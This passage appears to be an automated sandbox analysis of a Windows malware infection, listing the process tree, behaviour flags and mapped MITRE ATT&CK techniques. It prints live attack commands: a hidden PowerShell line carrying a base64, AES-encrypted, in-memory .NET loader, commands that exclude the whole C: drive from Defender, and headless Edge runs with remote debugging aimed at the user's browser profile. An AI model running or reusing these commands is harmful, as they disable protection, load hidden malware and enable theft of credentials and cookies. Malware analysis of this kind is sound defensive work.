      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=43708 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
        6⤵
        Uses browser remote debugging
        
        PID:7148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=43708 --remote-allow-origins=* --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --edge-skip-compat-layer-relaunch
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:7212
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x22c,0x230,0x234,0x228,0x23c,0x7ffb485df208,0x7ffb485df214,0x7ffb485df220
        8⤵
        
        PID:7352
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2728,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2716 /prefetch:2
        8⤵
        Modifies registry class
        
        PID:7552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2952,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2944 /prefetch:3
        8⤵
        
        PID:6948
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2972,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:8
        8⤵
        
        PID:3852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=43708 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3344 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:7536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=43708 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3548,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6200
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:5012
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:8420
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:8652
    - - C:\Users\Admin\AppData\Local\Temp\10417120101\a0314adca1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417120101\a0314adca1.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:8092
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10417131121\5ym0ZYg.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7200
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10417131121\5ym0ZYg.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        
        PID:5680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:7836
    - - C:\Users\Admin\AppData\Local\Temp\10417140101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417140101\TbV75ZR.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5816
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:3612
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        
        PID:4924
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 648
        7⤵
        Program crash
        
        PID:5692
    - - C:\Users\Admin\AppData\Local\Temp\10417150101\qWR3lUj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417150101\qWR3lUj.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5812
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:4716
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2416
    - - C:\Users\Admin\AppData\Local\Temp\10417160101\p3hx1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417160101\p3hx1_003.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:4576
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:6524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6760
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:6712
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        
        PID:2516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        8⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        7⤵
        Deletes itself
        Executes dropped EXE
        
        PID:7028
    - - C:\Users\Admin\AppData\Local\Temp\10417170101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417170101\Rm3cVPI.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4264
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2y1617.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2y1617.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:5876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:1508
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  PID:5700

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2924

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5008

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4924 -ip 4924
1⤵
PID:7708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6112

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4048

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion